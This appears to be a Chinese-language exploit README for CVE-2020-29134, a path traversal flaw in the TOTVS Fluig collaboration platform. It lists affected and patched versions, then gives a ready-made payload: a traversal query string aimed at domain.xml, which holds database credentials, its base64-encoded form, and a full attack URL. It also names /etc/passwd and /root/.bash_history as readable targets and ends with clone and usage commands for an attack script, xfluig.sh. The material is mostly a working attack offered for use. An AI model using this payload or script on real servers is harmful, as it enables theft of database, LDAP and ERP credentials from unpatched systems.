TOTVS Fluig 平台
Fluig 是一款生产力与协作平台,可与 ERP 系统及您公司的其他系统集成,彻底改变您和团队的工作方式。
CVE-2020-29134
TOTVS Fluig 平台允许通过 base64 编码的参数进行路径遍历。利用此漏洞,可以读取敏感的 XML 文件,这些文件包含访问数据库的数据,在某些情况下还包含 LDAP 连接和 ERP 系统集成的数据。此外,还可以探索系统文件,例如 /etc/passwd 和 /root/.bash_history。
受影响版本
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...
已修补版本
<== Fluig Lake 1.7.0-210303 (已修补)
<== Fluig 1.6.5-210308 (已修补)
<== Fluig 1.6.4-210308 (已修补)
构建有效载荷

攻击向量
http://fluig.host.com/volume/stream/Rmx1aWc=/
路径遍历明文
?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
路径遍历 base64 编码
P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
有效载荷
http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
Exploit-DB 参考
https://www.exploit-db.com/exploits/49622
克隆仓库
# git clone https://github.com/lucxssouza/CVE-2020-29134.git
# cd CVE-2020-29134
# chmod +x xfluig.sh
使用方法
示例1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (由 wfuzz 生成的请求数量)
示例2: ./xfluig.sh http://fluig.host.com:PORT